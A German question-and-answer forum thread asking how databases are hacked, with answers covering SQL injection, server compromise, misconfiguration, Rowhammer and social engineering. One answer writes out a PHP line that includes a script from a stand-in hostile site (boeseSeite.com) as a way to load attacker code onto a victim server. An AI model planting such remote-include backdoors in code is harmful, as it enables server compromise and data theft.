Wie hackt man Datenbanken?

5 Antworten

Der Datenbankserver ist in 99,9% der Fälle vom Internet abgeschottet und nur intern erreichbar. Bedeutet, man kommt nur durch eine Injection auf einer anderen Serveranwendung (wie dem Webserver / PHP) ran, oder aber indem der Server selbst gekapert wird und dann intern Zugriff zur Datenbank verschafft wird.

Woher ich das weiß:Berufserfahrung – Inhaber einer App-Agentur & 15+ Jahre Programmiererfahrung

es geht immer darum Schwachstellen und Bugs in der Software/Datenbank auszunutzen... die "Taktik" ist also, dass man entweder danach sucht, was die Programmierer falsch gemacht haben könnten oder dass man versucht Fehler von Benutzern auszunutzen (welche viel häufiger vorkommen) ... z.B. "das leere Passwort" oder sowas :-) ...

Wenn du keine SQL Injection machen willst, dann musst du direkt versuchen den Datenbank-Daemon zu manipulieren. Oder direkt auf das Filesystem des Servers zu kommen, wo die Daten liegen.

Du tust mir Leid, würde ja gerne mein Wissen teilen, nur die Frage ist gleich ,,weg", die haben alle Angst solch ,,böses" Wissen von der Stange zu lassen, vor allem in der Moderation

Der Hackthebox Kurs ist ganz toll, also für SQLi

Und neue Taktiken, naja, es gibt immer Idioten, die es versäumen die Datenbank richtig zu konfigurieren, egal ob NoSQL oder SQL db

Das ist nicht nur ein Softwareproblem, wer ungefiltert SQL Statements an die DB gibt, hat sowieso schon verloren. Wenn dann noch der falsche Datenbank User dahinter steckt mit entsprechenden Rechten, weiß man, das der Admin kein Plan von der Sache hat. Da ist die reverse shell im Nun implementiert und der Server womöglich kompromittiert, naja, so ist es halt.


BABYX 
Beitragsersteller
 29.08.2021, 12:10

besteh die Möglichkeit privat zu chatten?

Abgesehen vom sehr schwierigen Rowhammer sind die Injections so ziemlich die einzige Möglichkeit, an die Dateninhalte zu kommen, denn meist sitzt der SQL-Server im internen Netzwerk und ist wegen der privaten IP von außen nicht erreichbar. Du kommst ja ohnehin meist nur auf http(s) ran.
Social engineering wäre da so eine Möglichkeit, z.B. das Einbinden eines externen PHP-Scriptes schmackhaft zu machen.
In ein harmlos anmutendes php-Script, was durch einen Deppen auf den feindlichen Server geladen wird, muss nur eine Zeile wie

include 'http://www.boeseSeite.com/attack.php';

eingebunden werden, deren Link anfangs auch nur harmlosen Code enthält, der dann problemlos irgendwann umgeschrieben werden kann.
Aber wer sowas zulässt, macht meist ohnehin schlimmere Fehler.